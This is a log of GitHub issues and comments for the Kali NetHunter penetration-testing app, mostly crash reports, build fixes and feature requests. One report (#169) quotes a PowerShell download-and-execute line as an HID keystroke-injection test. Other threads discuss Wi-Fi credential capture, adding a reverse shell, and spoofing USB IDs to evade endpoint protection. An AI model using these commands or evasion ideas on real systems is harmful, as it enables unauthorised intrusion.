On Apr 14, 2016 9:05 PM, "binkybear" <notifications@github.com> wrote:

[2016-04-15 01:38] thesle3p commented on #128
Tried using the apk you sent and hostapd-wpe 2.5 with the patch from the repo you used with the same authentication problem.

[2016-04-15 01:41] binkybear commented on #128
Fixed HID error:
https://github.com/offensive-security/nethunter-app/commit/9ba279845b756576efbcbce1b657ed403f6dda43

New APK with HID fix:
https://transfer.sh/IJod2/nethunter-app-release.apk

The crash is occurring I believe because of some changes in Android API.

--------
So back to your authentication issue, I assume its exactly same error as before?  Did you also try "forgetting" network then

[2016-04-15 01:42] thesle3p commented on #128
I tried that. I also tried from both android and Debian.

[2016-04-15 01:50] binkybear commented on #128
Did you try off the 2.5 hostapd?  Here is the binary I used (which worked for me):

https://github.com/binkybear/nethunter-utils/blob/master/usr/bin/hostapd-wpe

(I used TPLINK in testing)

[2016-04-15 02:17] thesle3p commented on #128
Ok, so that binary seems to require different libssl binaries  then apt-get install provides and the app crash bug is present in the kali services and duck hunter tabs as well.

[2016-04-15 11:14] binkybear commented on #128
Reverted API back to earlier appears to fix issues with app crashes.  However, we will one day have to upgrade to latest api and will probably encounter these issues again:

https://transfer.sh/4EvQ7/nethunter-app-release.apk

[2016-04-15 12:46] thesle3p commented on #128
Great, but so far I have been unable to get hostapd-wpe to capture creds, once hostapd-wpe is pushed to the nethunter repo I will try again. Also just a suggestion maybe the app should parse hostapd-wpe's output and log captured creds to a file?

-----Original Message-----
From: binkybear [mailto:notifications@github.com]
Sent: Friday, April 15, 2016 7:14 AM
To: offensive-security/nethunter-app
Cc

[2016-04-20 07:50] bkr32 commented on #98
Issue seems to be present on cos13

[2016-04-20 17:03] thesle3p commented on #128
Any idea when hostapd-wpe will be pushed to the Nethunter Repo?

[2016-04-20 17:30] thesle3p commented on #128
Flashing nethunter again and compiling hostapd-wpe worked, only suggestion is to have the app parse hostapd-wpe's log file and save it's contents to a external file to make offline cracking easier.

[2016-05-27 13:18] pyc0de opened #130 "nmap: target dulpication"
Scanning, for example, 192.168.0.1 from NMAP tab results in:
nmap  192.168.0.1 192.168.0.1

[2016-05-27 13:27] pyc0de opened #131 "unable to run multiple commands in terminal"
If kali terminal instance already running, Nethunter app is unable to open new terminal instances and run commands in them. You have to close all terminals and then launch command from Nethunter app.

[2016-05-27 13:39] pyc0de commented on #131
update: this bug is not always reproduceble, will test further.

[2016-05-29 00:05] thesle3p opened #132 "[suggestion] nethunter app should be automate the process of wlan1 connecting to a network."
One of the most annoying steps in using Nethunter in a pen test is connecting a USB interface to connect to a wireless network in the chroot from the terminal app, would it be possible to make a pane in the nethunter app to automate the process?

[2016-06-01 17:19] pyc0de commented on #131
this bug is elusive, closing for now.

[2016-06-02 21:58] pyc0de commented on #131
been dealing with this bug alot lately. frequently when I launch cuatom cpmman from nethunter app, new terminal won't open.  I have to close all terminals, and then rerun command.

[2016-06-08 17:44] vay3t opened #133 "bettercap GUI"
suggestion: Create a GUI for bettercap as sqlmap that looks like the one in mitmf. it would be useful, in sqlmap, I saw a [project using web interface](https://github.com/Hood3dRob1n/SQLMAP-Web-GUI). It's not a bad idea

[2016-06-10 07:33] pyc0de commented on #130
Fixed, thanks!

[2016-06-10 07:33] #130 closed

[2016-06-30 09:05] m0rv4i opened #134 "One plus one macchanger issue"
Hi guys,

So I'm running **CM 13.1** on my **OPO** and I built and flashed **nethunter 3.1** (using the -m flag) and it mostly works fine, aside from the macchanger.

When I try to set a mac using the MAC Changer it successfully writes to the _/sys/devices/fb000000.qcom,wcnss-wlan/wcnss_mac_addr file_, and the wifi is restarted but the new mac isn't used.

I then tried enabling airplane mode then

[2016-07-01 21:56] binkybear commented on #134
I'm on CyanogenOS 13.1 and it appears to be working for me (wifi works after change).

I'm not sure if it's a CM issue or not.

[2016-07-01 22:10] robjbone commented on #134
The WiFi still works after the change for me it just isn't using the new MAC address until I toggle airplane mode.

The full CM version is 13.1- ZNH2KAS1KN if that makes a difference...

[2016-07-06 05:35] shizonic opened #136 "OnePlus 3: Installer ERROR 1"
I just built a flashable zip installer for the OnePlus 3 and got an ERROR 1 while the install process on TWRP.

Recovery log attached.

[recovery.txt](https://github.com/offensive-security/nethunter-app/files/349136/recovery.txt)

[2016-07-06 05:54] #136 closed

[2016-07-07 01:25] #134 closed

[2016-07-25 19:34] vay3t opened #137 "expanding range of attacks and other utilities"
suggestion:
1. Create a module for wifi passwords "nethunter" (one click) and other utilities.
2. Add simple reverse shell with netcat or similar (not always we will have metasploit). like a mpc https://github.com/g0tmi1k/mpc and also for HID attack (the idea is to have these two alternatives: 1- to copy the code and then later use. 2- be able to use in an attack HID).
3. For HID attack is a good

[2016-07-26 01:13] binkybear commented on #137
1. Could you explain 1 more
2. Would be easy in duckhunter there are some example presets which are stored here: https://github.com/offensive-security/nethunter-app/tree/master/assets/nh_files/duckyscripts and menu options are here: https://github.com/offensive-security/nethunter-app/blob/master/src/com/offsec/nethunter/DuckHunterFragment.java#L425.  It would just be matter of developing a reverse

[2016-07-26 15:44] vay3t commented on #137
honestly I had forgotten the usefulness of "DuckHunter" (the habit of frequently using HID). edit the APK to add a new attack makes little comfortable. in that case it is more convenient to make a `ls` view files and list them.

other utilities: so far no other than #133 (lately have occupied much --half-duplex but I have my doubts whether it is really necessary to create a new module as mitmf.)

[2016-08-02 06:29] vay3t commented on #137
one idea is to add a module to exploitation NFC

[2016-08-02 07:53] thesle3p opened #138 "[feature request] option to manually specify USB Vendor and Product IDs for HID attacks"
Would it be possible to add a option to manually change the USB Vendor and Product IDs when executing HID attacks? Some HIPSs block Android Vendor IDs or lock down the workstation to only execute keyboard commands from a keyboard with a  specific Vendor or Device ID. I know you can change them by editing a file in /dev/ but being able to do so from the app would be a lot more practical.

[2016-08-10 02:42] binkybear commented on #138
This is a good idea and one I've looked at before.  Hope to add it soon.

[2016-08-13 08:09] #131 closed

[2016-09-23 10:43] thel3l opened #144 "[QUESTION] Work on the custom powershell file delivery?"
Hey.

@binkybear in another commit in nethunter-utils , you mentioned that you intended to set up a custom Powershell upload technique. I've started work on this (not yet committed), but I'd like to know if this is something that I should continue working on.

Thanks.

[2016-09-23 14:22] jmingov commented on #144
Hi @thel3l , can you provide some more detail of the implementation? Maybe push the changes to a cloned repo or something like that.

BR

J

[2016-09-23 15:06] thel3l commented on #144
@jmingov Yep. Sorry about the lack of details. But the second pull request is the one I was referencing.

I'm currently on a mobile. If you're interested, I can just push the changes I was making to my repo and open a PR. I wasn't sure as in the last PR on nethunter-utils, @binkybear said he'd have to test it out a bit and then decide if this functionality was required.

[2016-09-23 16:47] thel3l commented on #144
@jmingov Take a look at [PR#145](https://github.com/offensive-security/nethunter-app/pull/145) . It's what I pieced together.

[2016-09-24 16:33] qwertyIsMyPassword opened #146 "attempting to compile the nethunter app from android studio always make it crash"
If you attempt to generate your own nethuneter app from android studio, you get  an error after apk install from the phone - "no title" terminals or "nethunter has stopped working. "

[2016-09-24 16:35] binkybear commented on #146
You need to give a bit more information.  I just generated a pushed an apk a minute ago and everything is working fine.

Do you have a logcat with error?  What OS are you on?

[2016-09-24 16:39] qwertyIsMyPassword commented on #146
I'm on cm 13, compiling the android project from with windows. The apk is install, but my attempt to launch for ex - the Kali service tab result in app crash. Please try it and let me know if you can replicate it. Else I will provide logcat.

I am sorry about my English. It is not my first language.

[2016-09-24 16:52] binkybear commented on #146
I see error now.  Just that tab right or do you see it anywhere else?

[2016-09-24 19:10] binkybear commented on #146
Please try pulling with latest update and see if it's fixed for you.

[2016-09-24 21:12] thesle3p opened #147 "nethunter app crashes when loading large duckhunter scripts"
It looks like on app version 3.15 the app crashes when loading large duckhunter scripts (only noticed this issue after updating to app version 3.15).

[2016-09-24 21:21] binkybear commented on #147
@thesle3p - Can you send me an example file you are trying to load so I can test fixes.  If you could, please email it to binkybear@nethunter.com.  I also think this might have happened in earlier versions.

[2016-09-25 05:33] qwertyIsMyPassword commented on #146
Thank you for the help. I also have noticed it is crash when I try to run any script needing root access .  example - try to add new netapackages create crash, try to run nethunter scripts cause crash, hid attack is not run after app update (or my custom compile on android studio) etc. basically all section of app that need root access are fail. please check.

thank you.

[2016-09-25 16:20] binkybear commented on #146
I can't recreate this.  Running update and metapackages runs fine for me as well as other custom commands.

Hid attack is running fine for me also.  Maybe try doing a clean and rebuild? Also, double check permissions for nethunter app and terminal app.  If you can also check logcat (Android Monitor in Android Studio) that may give an indication of error you are getting.

[2016-10-11 01:08] D13man opened #151 "[Feature(s) Request] MAC Changer able to paste MAC from clipboard + be able to paste things from outside the terminal"
The title says it all, I would like to be able to paste the MAC from the clipboard on the MAC changer's text box.

and also, now we are able to copy and paste stuff from inside the terminal to the outside but it doesn't work vice versa, is it a bug or it's still have to be added?

[2016-10-14 19:34] thesle3p commented on #138
Any idea as to when this will roll out?

[2016-10-14 19:37] #128 closed

[2016-11-11 16:48] thesle3p commented on #147
I sent you a email with this a few months ago, any updates?

[2016-11-11 17:37] thesle3p commented on #138
Ideally it would pull vendor ids and names  from this: http://www.linux-usb.org/usb.ids

[2016-12-16 16:37] #123 closed

[2016-12-23 11:30] bkr32 opened #154 "APK generation in payload generator"
Metasploit Payload Generator has been updated to include APK generation
https://github.com/g0tmi1k/mpc/commit/eb2279a7f930c86914b506f05d1803118996ca97
possible to add?

[2016-12-28 10:11] #154 closed

[2017-01-02 10:46] Zarkopafilis commented on #147
What's the length of the text?

[2017-01-02 10:48] Zarkopafilis commented on #132
I think that it would not be such a good enhancement; android on itself is configured to just use wlan0. Also, with wlan1 being transferred to monitor mode , as well as performing spoofs, etc that often, it wouldn't be a good idea to start messing with android. wlan0 has even got issues with 'weak'/poorly made routers when changing it's mac address too so...

[2017-01-04 20:53] thesle3p commented on #132
I hate to say this but, can you reword what you just said so it makes sense?

[2017-01-04 20:57] thesle3p commented on #147
410001 lines

[2017-01-19 02:24] ghost opened #157 "No Service, Oneplus One, Kali-nethunter"
Hi guys,

I was installing Nethunter via Kali-linux and I followed the main documentation step by step, then I came across a problem because I was using USB 3.0 (I'm guilty because I did not use USB 3.0 or else I know everything would have ran perfectly).

The following commands worked ./oemUnlock.sh, ./stockOpoFlash.sh 64gb. The last command which was ./twrpFlash.sh after running it for while it

[2017-01-31 09:13] Lexus89 commented on #128
First of all sorry for replying to this closed feature request.

I was wondering why switching to hostapd-wpe if you can also set hostapd-mana to target a single AP (enable_mana=1 - means shutting down KARMA)? Wouldn't it be easier just having a single hostapd installation on nethunter? Mana has been patched as well for the nt_domain_hack (patch still pending approval at hostapd-wpe repo).

https:

[2017-02-03 19:16] Lexus89 opened #159 "Feature request"
A front end for Mana EAP scripts would be really useful. Currently i am running the latest apk from the offensive-security website and it only has front ends for the regular MANA script and hostapd-karma. Also i noticed the hostapd-wpe directories were missing (certs: ./bootstrap etc.)

[2017-03-04 13:27] serpunja opened #162 "hostapd-wpe.eap_user - Where?"
What is inside?
Where to download the file hostapd-wpe.eap_user?

[2017-03-04 13:57] serpunja opened #163 ""Script to execute:" - Where edit?"
**Where this file?:**
![p_20170304_163542](https://cloud.githubusercontent.com/assets/24878620/23579266/ca105d48-00fa-11e7-8ce7-cb485dd12cd5.jpg)

**It does not correct command:**
![p_20170304_164914](https://cloud.githubusercontent.com/assets/24878620/23579269/e785befe-00fa-11e7-8bd6-5e9750af1e6d.jpg)
**Tell me please.**
 **As the name of this file ?**  In Nethunter .

[2017-03-06 16:27] serpunja commented on #162
Thanks for the help.

Found!
https://github.com/syakesaba/hostapd-wpe/blob/master/hostapd-wpe.eap_user

[2017-03-06 16:27] #162 closed

[2017-03-07 13:40] jmingov commented on #163
Hi @serpunja,

Looks like the hostapd-wpe package is no installed.

As you can see here, http://tools.kali.org/wireless-attacks/hostapd-wpe it is a kali package, try doing `apt-get install hostapd-wpe` inside a kali terminal as root, that sould fix the problem.

You cant change the comand executed since its harcoded inside the nethunter app.

See https://github.com/offensive-security/nethunter-app

[2017-03-09 11:42] serpunja commented on #163
@jmingov  O.K

[2017-03-09 11:42] #163 closed

[2017-03-15 08:26] electricworry opened #164 "Services won't start on new builds of Nethunter (e.g. 3.15.4) on OnePlus One"
The issue I have is that services (such as SSH, Metasploit) never start automatically on device boot. If I understand correctly, these services should be started by the NetHunter app on device boot. However, when I look at the app permissions, the app has the "Auto start" permission, but it is "(never used)". Despite several reboots, I never see the services start, and I don't get the nice message

[2017-03-27 19:14] Sitsme opened #167 "Nethunter App does not have permission to send to NetHunter erminal! & "error launching intent. install android terminal""
Help..
i was installed nethunter Version 3.15.4(release-keys) app on my Oppo R815 (App,Chroot, ..etc)
I already remove Chroot, Reinstall Busybox, Reinstall nethunter and all tutorial on Google

and i cant found my values on /res/value<==nothing on res
my android phone spesification and my nethunter :
-oppo r815 os 4.2.1
-Linux version 3.4.5 (root@ubuntu)
-Busybox v1.26.2 -streicson
-Nethunter Term

[2017-03-30 23:12] kimocoder opened #168 "New Feature Suggestion: Kernel Modules"
How about adding a new tab for kernel modules listing / loading (module loading support needed ofc)
Added a pic of KoControl just to point where to go ..

![unnamed](https://cloud.githubusercontent.com/assets/4252297/24529934/efc75dd4-15ae-11e7-80cb-13b3ba106c8d.png)

[2017-05-15 07:32] electricworry commented on #164
I think I've figured it out...

At some point the following change was made:

[code]

Reversing this change allows Auto Start to work again.

Would it be helpful for me to fork and offer a pull request? I'm not sure whether this change was intentional or was a replace operation that went too far.

[2017-06-26 05:03] GabrielTK opened #169 "DuckHunter Support: PT-BR Keyboards"
Hey Guys,
I was testing DuckHunter when I noticed the following happens:
`iex (wget "http://bit.ly/dfdfdf").Content` is written as `iex (wget ^httpÇ;;bit.ly;dfdfdf^).Content` and, if I choose Portuguese in languages, `iex *wet @http>&&bit.ly&dfdfdf@(.Content`. The computer keyboard Layout is PT-BR (ABNT).

Can someone implement PT-BR layout or explain how to do so, so I can do it and send a PR??
T

[2017-06-26 18:52] jmingov commented on #169
Hi @GabrielTK,

The file you need to edit is in other repo, in the app repo.

https://github.com/offensive-security/nethunter-app/blob/master/assets/nh_files/modules/keyseed.py#L1306

We already have PT integrated, so it can be a wrong char mapping or just PT_BR is making use of a different key layout.

[2017-07-04 03:03] guilherme-gmonteiro commented on #169
Hey,

I Tested too and  keys 'g' and G dont work in pt-br or in pt language

can someone explain how to add?

[2017-07-31 20:35] marxenegls opened #170 "glitch: ANDROID_DAILY_OVERRIDE environment variable Gradle build"
Error:(15, 0) The android gradle plugin version 2.4.0-alpha1 is too old, please update to the latest version.
To override this check from the command line please set the ANDROID_DAILY_OVERRIDE environment variable to "9af6871d65a80a321354bdc83bf39b4c4754a4e4"

i am boggled how in Hal's name is 2.3.3 newer than 2.4.0 no matterwhat_version ?
  too old no less .

I'm using  the latest stand alone and

[2017-08-01 14:06] nik012003 commented on #138
I'm trying to get this feauture to work but I can't find a working way to change the vendor Id from the terminal.
Could you please tell me how you did it?
Thank you very much!

[2017-08-18 03:28] icthieves opened #171 "'./"

[2017-08-18 03:28] #171 closed

[2017-09-01 10:57] Cubuss commented on #167
https://github.com/offensive-security/kali-nethunter/issues/346

[2017-09-19 05:19] an0mali commented on #164
It doesn't seem that code in particular at fault, but the Compile SDK version. At that point it went from API23 to API25, which doesn't seem to work properly on CM12.1 for some reason. Readme.md has not been updated to reflect this change, not sure if it was intentional? Trying to recompile it with API23, on my machine, always results in:

`/home/blah/Documents/apk_source/nh.newest.dev/nethunter-a

[2017-09-19 05:31] an0mali commented on #164
SO...

`android:TextAppearance.Material.Widget.Button.Borderless.Colored"`
and
'android:TextAppearance.Material.Widget.Button.Colored'

Requires minimum API level of 24, and Android 5.1.1 is API23, so backwards compat is broken at this point in time for master fork... I think...

[2017-10-31 22:07] Bry-fi opened #176 "Wardriving and Deauth issues"
Wardriving does not work. In previous version the wardriving feature would activate the notification in the top right. I am using a Nexus 6 lollipop. I fixed this by using a previous version of the app to anyone having this issue. The deauth just crashes when you scan for networks.

[2017-11-02 15:46] sk-y2k commented on #176
+1
Agreed. Didn't test wardrobing, but Deauth crashing...

[2017-11-27 13:03] nik012003 commented on #176
I think I've found the bug in the Deauth fragment and I'll fix it as soon possibile.
Could you send me a logcat, just to be sure I'm facing the same bug as you.

[2018-02-18 13:49] simonpunk opened #178 "Not allowed to start service Intent"
Hi, @binkybear

I found that the latest nethunter-app has some issues which not allowing the app running in background.

Some references [here](https://stackoverflow.com/questions/46445265/android-8-0-java-lang-illegalstateexception-not-allowed-to-start-service-inten)

Would you help to fix it? Thank you.

[2018-03-28 16:33] venssy opened #179 "Certificate pinning change yet"
https://github.com/offensive-security/nethunter-app/blob/0855cdb6b22d604e707fc8b005a8ad090120d604/src/com/offsec/nethunter/ChrootManagerFragment.java#L125
Pin changed to b7dcaa15ba91e250fb58c30658ca9817c668a2d6.

[2018-04-06 10:28] #170 closed

[2018-04-15 14:31] aeroroland commented on #178
I think this is may be due to the runOnBoot permissions changing for Android O, but it would be helpful if you could add what you were doing when you got the error message. I'll submit a pull request with my fixes.

[2018-04-18 02:00] jmmmbnnn opened #181 "SearchSploit Not Working After Update"
I have the latest updates on a Nexus 10 (manta) device.

Load DB in SearchSploitFragment is stuck with no progress when trying to load exploitdb after 'apt update && apt full-upgrade'.

files.csv does not exist in /usr/share/exploitdb, only files_shellcodes.csv and files_exploits.csv.
The columns PLATFORM and TYPE should to be swapped in the schema when creating SearchSploitTable.
Because the colu

[2018-04-18 06:31] jmingov commented on #181
Ill take a look over the latest exploitDB changes. Thanks @jmmmbnnn.

[2018-04-26 17:05] TheMMcOfficial opened #183 "is it possible to add language/keyboard layout for ducky script (duckhunther)"
Is it possible to add languages/keyboard layouts for the ducky script ?
I'm on a nexus 6p with android 8.0.0.
I want to add some canadian keyboards!

[2018-05-04 01:33] TheMMcOfficial commented on #183
all info is here: https://github.com/offensive-security/kali-nethunter/issues/1115#issuecomment-386368432

[2018-05-04 01:33] #183 closed

[2018-06-19 11:48] mrbanzeras commented on #151
Use clipper bro  suposed work like that 1 copy text from chrome 2 copy text from cliper 3 paste text in terminal ... well  there is no way with no way ;)

[2018-08-06 19:28] TheMMcOfficial commented on #181
I had the same issue few days ago I simply go there and download the latest apk (2016).
https://github.com/cSploit/android/releases

Then I install it on my phone and download all the "update" in the app.

[2018-09-13 06:31] flypatriot opened #188 "SearchSploit and CustomCommands causes the app crash"
OnePlus 3T (A3003) Nougat 7.1.1 (OxygenOS 4.5.1). Last NetHunter nightly build 2017.11-18-1618 and ZaneZam boeffla-nethunter kernel v.2.2_20171124.
Compiling platform - last Android Studio (Build Tools - 28.0.2, SDK Tools - 26.1.1, SDK Platform-Tools - 28.0.1, gradle - 4.10, gradle build tool - 3.3.0-alpha08).
The app compiles without any problems. Everything's fine. While runniing in mobile there

[2018-09-15 08:47] flypatriot commented on #188
After debugging find a problem in **androidx.appcompat.widget.SearchView**. To solve this problem you need to add **line import android.widget.SearchView;** in import section of two files: SearchSploitFragment.java and CustomCommandsFragment.java. Don't forget to delete or comment in line **import androidx.appcompat.widget.SearchView;**

[2018-09-15 09:36] kimocoder commented on #188
@fat-tire

[2018-10-09 07:33] fanntom commented on #181
Is this issue solved yet?

[2019-01-12 08:08] argtje99 commented on #181
I don't think so.

[2019-01-12 08:09] argtje99 commented on #181
@fanntom i don't think so

[2019-01-12 08:35] argtje99 commented on #181
I don't know for sure if this issue has to do with the same as mine.  When i click the tab SearchSploit in Nethunter. And click Load DB. It keeps loading without any progress. But there pops up a toast with DB FEED DONE. I don't know if this is Nethunter's issue or chroot.

[2019-01-23 10:20] #188 closed

[2019-02-10 15:47] kimocoder opened #193 "chroot download/install fails [Android 9]"
The chroot download/install fails with the message that there is "no network connection" which isn't correct.. unpacking to "/data/local/nhsystem" is a fix for it I used, but I'd would been nice to have it fixed.

Thanks

[2019-02-13 04:43] Re4son commented on #193
I'll look into it

[2019-02-23 03:30] Re4son commented on #193
Which arch?

[2019-02-23 04:03] kimocoder commented on #193
arm64. Think I got it, testing/building the debug apk now

[2019-02-23 17:16] #193 closed

[2019-02-24 03:02] full10 commented on #193
What is the target path for chroot?

[2019-02-24 03:04] kimocoder commented on #193
/data/local/nhsystem

Bur I've fixed it in those commits

[2019-02-24 03:07] full10 commented on #193
Ok trying it now. Ty

On Sat, Feb 23, 2019, 10:04 PM Christian Bremvåg <notifications@github.com>
wrote:

[2019-03-17 10:40] debpedrano opened #200 "Creation of new logo"
Good day project owner,

About the enhancement of the project, it would be better to have its own logo for a clearer view and can be recognized easily. Just my opinion, just mention me and im ready to create a new one!.

[2019-03-20 09:14] #200 closed

[2019-03-31 01:47] Re4son commented on #181
#https://github.com/offensive-security/nethunter-app/pull/206

[2019-03-31 20:57] Re4son commented on #179
Thanks for letting us know.
Fixed in 11b49dc38a92c59142456a9a274c92009d35d253

[2019-03-31 20:57] #179 closed

[2019-03-31 20:59] Re4son commented on #178
Should be working again with nethunter-app >= 2019.1

[2019-03-31 20:59] #178 closed

[2019-03-31 21:00] Re4son commented on #167
Fixed in 2019.1

[2019-03-31 21:00] #167 closed

[2019-03-31 21:21] Re4son commented on #157
Thanks for reaching out. Yes, you can use your phone exactly the same as if NetHunter wasn't installed

[2019-03-31 21:21] #157 closed

[2019-04-09 08:57] Re4son opened #207 "New fragment "InstallApk.java" required"
Hi jmingov,

Would you be able to help out with the new apk installation routine for Android versions Oreo and above?
The installer checks for the Android SDK version and if it is >= 26 it installs the nethunter-app as system app and copies all other apks to "/sdcard/nh_files/cache/apk".
We need a fragment that kinda runs the following during the first start of the nethunter app:

[code]

Are you

[2019-04-09 09:48] #181 closed

[2019-04-10 04:07] kimocoder commented on #168
@Re4son something like this is the menu (instead of standalone app) would be awesome

[2019-04-11 05:29] Re4son commented on #176
Fixed in version 2019.1

[2019-04-11 05:29] #176 closed

[2019-04-11 22:54] jmingov commented on #207
Hey  :)

Ill try to take a look at this in the next few days.

@Re4son,

1. Should this be run during the first start of the nethunter app? **Yes**
2. Should run again when the chroot is updated/uninstalled/...?
3. Will the user need to run this later again at some point?

Best
J

[2019-04-12 00:14] Re4son commented on #207
Awesome. Thanks heaps!

1. Should this be run during the first start of the nethunter app? **Yes**
2. Should run again when the chroot is updated/uninstalled/...? **No**
3. Will the user need to run this later again at some point? **No**

@PaulSec,
Any idea how we can install apps from the google store at the same time, e.g. DriveDroid and the WHID Injector app?

The nethunter-app is installed as

[2019-04-12 00:27] Re4son opened #209 "Recativate "Check App Update" button"
@PaulSec,
The "Check App Update" button is currently greyed out because of an issue with the update process.

A decision to install the nethunter-app as privileged app across the board is still outstanding https://github.com/offensive-security/nethunter-app/issues/207#issuecomment-482385989.
Assuming we would agree on installing the app under /system/priv-app, could we re-enable that button and in

[2019-04-12 00:39] kimocoder commented on #209
Good idea.. I'm fixing the big PR now..

[2019-04-14 11:24] PaulSec commented on #207
Mmh.. I might miss something (sorry for that :)) but I guess the easiest way would be to sign my apps on my own and let you know as soon as I have an update (eg. for the Shodan app for example)

I know that some people don't want to download from the Play Store and don't want to be tied with Google. That's why I thought about releasing an APK itself and people could download it on their own (but s

[2019-04-14 22:30] Re4son commented on #207
Good point. Now here's a thought:

How about we create our own "NetHunter Hackstore" and we can add a menu to the nethunter app to install and update apps based on the same manifest we would use during the creation of the nethunter image?
What do you think?

[2019-04-15 06:51] Re4son commented on #207
Good point.

[2019-04-17 11:28] lavanoid opened #211 "Latest nethunter.apk not working on Android 6.0 Marshmallow"
The current version of the nethunter APK doesn't work on my device (HTC One M8), which is running Android 6.0. After flashing the nethunter zip, the Nethunter app doesn't show on the app drawer and neither will it install when I attempt to install the APK manually.

Currently the only workaround I have is to install an older version of the APK, such as this one: https://github.com/offensive-securi

[2019-04-18 01:19] Re4son commented on #211
Might be the installer, rather the apk itself. I need your help to locate the issues if that's ok with you.
By "current version", do you mean release [2019.1](https://github.com/offensive-security/nethunter-app/releases/tag/v2019.1)?

Did you build the nethunter zip yourself? If so, which "kali-nethunter" branch did you use?

What happens if you uninstall the old apk and manually install the curre

[2019-04-18 12:12] lavanoid commented on #211
By "current", I am referring to this one: https://github.com/offensive-security/kali-nethunter/blob/master/nethunter-installer/update/data/app/nethunter.apk

I built the Nethunter zip myself and I used the branch I used was the "master" branch. When I uninstall the old APK, the device still refuses to install the currently available version.

[2019-04-18 23:06] Re4son commented on #211
Do you get an error message during installation?

[2019-04-18 23:48] lavanoid commented on #211
0_o Now it installed, after manually installing the APK again. Very odd. Also, sometimes after flashing the .zip and boot the device, I have to reboot it again for Nethunter to appear in the app drawer. No idea what that is all about.

I'm going to assume that the ROM I'm using is a bit temperamental.I guess this issue can be closed.

[2019-04-19 00:24] Re4son commented on #211
Glad to hear that it's working.

[2019-04-19 00:24] #211 closed

[2019-04-19 02:14] Re4son commented on #169
Should be fixed with v2019.2-rc2
Please reopen if you still experience issues.

[2019-04-19 02:14] #169 closed

[2019-04-19 02:15] Re4son commented on #164
Thanks for raising this issue.
Should be fixed in v2019.1.

[2019-04-19 02:15] #164 closed

[2019-04-19 02:16] #146 closed

[2019-04-19 02:21] Re4son commented on #119
Cannot reproduce error

[2019-04-19 02:21] #119 closed

[2019-04-19 02:23] Re4son commented on #147
Does the issue still persist with the latest app version?

[2019-04-19 09:38] kimocoder opened #213 "TODO LIST"
Ok people, we still got some work to do..

Here's the TODO list for now. @Re4son will add more.

* We got two busyboxes running
  - One with v1.25.0-NetHunter
  - One (cmd: busybox) with v1.30.1 (when in chroot)
  - busybox could be linked or updated,

* "killkali" has some mounting issues (will add picture)
* "bootkali" has 1 output (issue) (will add picture)

* The UI could be improved (material

[2019-04-19 11:04] kimocoder commented on #213
**API**
Android Network API link [here](https://developer.android.com/training/basics/network-ops)

[2019-04-19 12:51] Re4son commented on #213
Great list @kimocoder . Might be easier to have individual issues for each of them. That would make it easier to work on them individually.
1. Busyboxe: I have one and the same in all of my four different nethunter devices. Best to raise a separate issue because that looks like a bug in the image you're using.

2. The mount errors are caused by non existing filesystems:
a) /sdcard/kali-chroot.img:

[2019-04-19 12:52] kimocoder commented on #213
Nexus 6P on latest official firmware, Android 8 with WiFi modules, HID, CDROM, dwc3 patch with ACA (Y-cable support) patches. works great, but yeah we could do much more.

![Screenshot_20190419-084150](https://user-images.githubusercontent.com/4252297/56424981-61f08780-6280-11e9-8a75-a2d2553add27.png)

[2019-04-19 12:57] Re4son commented on #213
Did you do a complete re-image before you installed the latest nethunter image? With all the testing you might have left over busyboxes from previous installs

[2019-04-19 12:57] kimocoder commented on #213
Yepp, that's my mission this easter. I'll get them.

[2019-04-19 12:58] Re4son commented on #213
Get what?

[2019-04-19 13:00] kimocoder commented on #213
Yes, everythime.

Get those mounts for away.

[2019-04-19 13:08] Re4son commented on #213
Could you please check for busybox after you reflashed and rooted?
Then again after you installed nethunter?

Then install the pre-2019.1 nethunter app and check the errors during bootkali and killkali.

Thanks mate!

[2019-04-19 13:10] kimocoder commented on #213
Yes, needs to be tomorrow, been reading like alot the past data :+1:

[2019-04-19 13:18] kimocoder commented on #213
cSploit is way outdated the one MITM working is "Kill connections"
Therefor i ein zANTI2 instead.

[2019-04-19 13:25] kimocoder commented on #213
And some menu where modules (kmod) where we could load modules and set them in startup. Something like this

![Screenshot_20190419-092346](https://user-images.githubusercontent.com/4252297/56426125-0ffe3080-6285-11e9-8afe-213e695e07f3.png)